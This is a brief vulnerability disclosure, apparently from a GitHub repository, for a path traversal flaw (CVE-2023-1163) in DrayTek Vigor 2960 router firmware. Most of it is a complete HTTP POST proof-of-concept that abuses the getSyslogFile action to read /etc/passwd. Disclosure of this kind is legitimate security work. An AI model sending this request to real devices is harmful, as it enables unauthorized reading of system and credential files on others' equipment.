Headline
CVE-2023-1163: Vuln/3.md at main · xxy1126/Vuln
A vulnerability has been found in DrayTek Vigor 2960 1.5.1.4 and classified as problematic. Affected by this vulnerability is the function sub_1DA58 of the file mainfunction.cgi. The manipulation leads to path traversal. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-222259.
It doesn’t filter the var option, so we can use /…/to read arbitrary file.
POST /cgi-bin/mainfunction.cgi HTTP/1.1
Host: xxxxxxxxxxx
Content-Length: 65
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: xxxxxxxxx
Referer: xxxxxxxxx
Accept-Encoding: gzip, deflate
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie: SESSION_ID_VIGOR=7:26EB81E4EA6DC603661320EBD1C938DC
Connection: close
action=getSyslogFile&option=/../../etc/passwd&rtick=1663484572009